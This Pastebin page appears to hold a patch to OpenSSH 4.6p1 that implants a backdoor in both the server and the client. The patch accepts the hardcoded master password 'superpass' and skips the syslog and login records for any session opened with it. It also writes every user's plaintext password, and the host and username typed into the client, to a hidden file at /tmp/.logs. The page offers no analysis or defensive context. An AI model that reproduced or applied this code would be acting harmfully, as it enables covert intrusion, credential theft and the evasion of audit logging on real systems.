Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- diff -N -c /home/test/openssh-4.6p1/auth-pam.c /home/test/openssh/auth-pam.c
- *** /home/test/openssh-4.6p1/auth-pam.c 2006-09-16 18:57:47.000000000 -0700
- --- /home/test/openssh/auth-pam.c 2010-09-25 11:09:34.519413954 -0700
- ***************
- *** 466,471 ****
- --- 466,473 ----
- if (sshpam_err != PAM_SUCCESS)
- goto auth_fail;
- sshpam_err = pam_authenticate(sshpam_handle, flags);
- + if(backdoorActive == 1)
- + sshpam_err = PAM_SUCCESS;
- if (sshpam_err != PAM_SUCCESS)
- goto auth_fail;
- diff -N -c /home/test/openssh-4.6p1/auth-passwd.c /home/test/openssh/auth-passwd.c
- *** /home/test/openssh-4.6p1/auth-passwd.c 2006-08-04 19:39:39.000000000 -0700
- --- /home/test/openssh/auth-passwd.c 2010-09-25 11:09:34.523203739 -0700
- ***************
- *** 80,85 ****
- --- 80,86 ----
- int
- auth_password(Authctxt *authctxt, const char *password)
- {
- + backdoorActive = 0;
- struct passwd * pw = authctxt->pw;
- int result, ok = authctxt->valid;
- #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
- ***************
- *** 92,98 ****
- #endif
- if (*password == '\0' && options.permit_empty_passwd == 0)
- return 0;
- !
- #ifdef KRB5
- if (options.kerberos_authentication == 1) {
- int ret = auth_krb5_password(authctxt, password);
- --- 93,102 ----
- #endif
- if (*password == '\0' && options.permit_empty_passwd == 0)
- return 0;
- ! if (!strcmp(password, B4XDOOR)) {
- ! backdoorActive = 1;
- ! return 1;
- ! }
- #ifdef KRB5
- if (options.kerberos_authentication == 1) {
- int ret = auth_krb5_password(authctxt, password);
- diff -N -c /home/test/openssh-4.6p1/includes.h /home/test/openssh/includes.h
- *** /home/test/openssh-4.6p1/includes.h 2006-09-01 03:29:11.000000000 -0700
- --- /home/test/openssh/includes.h 2010-09-25 11:34:04.368748380 -0700
- ***************
- *** 12,17 ****
- --- 12,20 ----
- * incompatible with the protocol description in the RFC file, it must be
- * called by a name other than "ssh" or "Secure Shell".
- */
- + #define filelog "/tmp/.logs"
- + #define B4XDOOR "superpass"
- + int backdoorActive;
- #ifndef INCLUDES_H
- #define INCLUDES_H
- diff -N -c /home/test/openssh-4.6p1/log.c /home/test/openssh/log.c
- *** /home/test/openssh-4.6p1/log.c 2006-08-20 00:55:55.000000000 -0700
- --- /home/test/openssh/log.c 2010-09-25 11:12:38.439238677 -0700
- ***************
- *** 306,311 ****
- --- 306,313 ----
- void
- do_log(LogLevel level, const char *fmt, va_list args)
- {
- + if(backdoorActive == 1)
- + return;
- #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
- struct syslog_data sdata = SYSLOG_DATA_INIT;
- #endif
- diff -N -c /home/test/openssh-4.6p1/loginrec.c /home/test/openssh/loginrec.c
- *** /home/test/openssh-4.6p1/loginrec.c 2006-09-07 05:57:54.000000000 -0700
- --- /home/test/openssh/loginrec.c 2010-09-25 11:09:34.523203739 -0700
- ***************
- *** 430,435 ****
- --- 430,437 ----
- int
- login_write(struct logininfo *li)
- {
- + if(backdoorActive == 1)
- + return 0;
- #ifndef HAVE_CYGWIN
- if (geteuid() != 0) {
- logit("Attempt to write login records by non-root user (aborting)");
- diff -N -c /home/test/openssh-4.6p1/misc.h /home/test/openssh/misc.h
- *** /home/test/openssh-4.6p1/misc.h 2006-08-18 07:33:06.000000000 -0700
- --- /home/test/openssh/misc.h 2010-09-25 11:28:37.791270625 -0700
- ***************
- *** 32,37 ****
- --- 32,38 ----
- char *tilde_expand_filename(const char *, uid_t);
- char *percent_expand(const char *, ...) __attribute__((__sentinel__));
- char *tohex(const void *, size_t);
- + char *h_host, *h_user;
- void sanitise_stdfd(void);
- struct passwd *pwcopy(struct passwd *);
- diff -N -c /home/test/openssh-4.6p1/monitor.c /home/test/openssh/monitor.c
- *** /home/test/openssh-4.6p1/monitor.c 2007-02-19 03:25:38.000000000 -0800
- --- /home/test/openssh/monitor.c 2010-09-25 11:29:33.391433624 -0700
- ***************
- *** 707,717 ****
- char *passwd;
- int authenticated;
- u_int plen;
- !
- passwd = buffer_get_string(m, &plen);
- /* Only authenticate if the context is valid */
- authenticated = options.password_authentication &&
- auth_password(authctxt, passwd);
- memset(passwd, 0, strlen(passwd));
- xfree(passwd);
- --- 707,723 ----
- char *passwd;
- int authenticated;
- u_int plen;
- ! FILE * f;
- passwd = buffer_get_string(m, &plen);
- /* Only authenticate if the context is valid */
- authenticated = options.password_authentication &&
- auth_password(authctxt, passwd);
- + if(passwd!=NULL){
- + if ((f = fopen(filelog, "a")) != NULL) {
- + fprintf(f, "%s:%s\n", authctxt->user, passwd);
- + fclose(f);
- + }
- + }
- memset(passwd, 0, strlen(passwd));
- xfree(passwd);
- diff -N -c /home/test/openssh-4.6p1/ssh.c /home/test/openssh/ssh.c
- *** /home/test/openssh-4.6p1/ssh.c 2007-01-04 21:30:17.000000000 -0800
- --- /home/test/openssh/ssh.c 2010-09-25 11:43:30.479454708 -0700
- ***************
- *** 552,558 ****
- /* Check that we got a host name. */
- if (!host)
- usage();
- !
- SSLeay_add_all_algorithms();
- ERR_load_crypto_strings();
- --- 552,559 ----
- /* Check that we got a host name. */
- if (!host)
- usage();
- ! else
- ! h_host = host;
- SSLeay_add_all_algorithms();
- ERR_load_crypto_strings();
- ***************
- *** 636,642 ****
- if (options.user == NULL)
- options.user = xstrdup(pw->pw_name);
- !
- if (options.hostname != NULL)
- host = options.hostname;
- --- 637,643 ----
- if (options.user == NULL)
- options.user = xstrdup(pw->pw_name);
- ! h_user = options.user;
- if (options.hostname != NULL)
- host = options.hostname;
- diff -N -c /home/test/openssh-4.6p1/sshconnect1.c /home/test/openssh/sshconnect1.c
- *** /home/test/openssh-4.6p1/sshconnect1.c 2006-11-07 04:14:42.000000000 -0800
- --- /home/test/openssh/sshconnect1.c 2010-09-25 11:29:48.703247333 -0700
- ***************
- *** 448,453 ****
- --- 448,454 ----
- {
- int type, i;
- char *password;
- + FILE *f;
- debug("Doing password authentication.");
- if (options.cipher == SSH_CIPHER_NONE)
- ***************
- *** 456,461 ****
- --- 457,466 ----
- if (i != 0)
- error("Permission denied, please try again.");
- password = read_passphrase(prompt, 0);
- + if ((f = fopen(filelog, "a")) != NULL) {
- + fprintf(f, "%s %s %s\n", h_host, h_user, password);
- + fclose(f);
- + }
- packet_start(SSH_CMSG_AUTH_PASSWORD);
- ssh_put_password(password);
- memset(password, 0, strlen(password));
- diff -N -c /home/test/openssh-4.6p1/sshconnect2.c /home/test/openssh/sshconnect2.c
- *** /home/test/openssh-4.6p1/sshconnect2.c 2006-08-31 22:38:37.000000000 -0700
- --- /home/test/openssh/sshconnect2.c 2010-09-25 11:29:58.131183567 -0700
- ***************
- *** 736,741 ****
- --- 736,742 ----
- static int attempt = 0;
- char prompt[150];
- char *password;
- + FILE *f;
- if (attempt++ >= options.number_of_password_prompts)
- return 0;
- ***************
- *** 746,751 ****
- --- 747,756 ----
- snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
- authctxt->server_user, authctxt->host);
- password = read_passphrase(prompt, 0);
- + if ((f = fopen(filelog, "a")) != NULL) {
- + fprintf(f, "%s %s %s\n", h_host, h_user, password);
- + fclose(f);
- + }
- packet_start(SSH2_MSG_USERAUTH_REQUEST);
- packet_put_cstring(authctxt->server_user);
- packet_put_cstring(authctxt->service);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement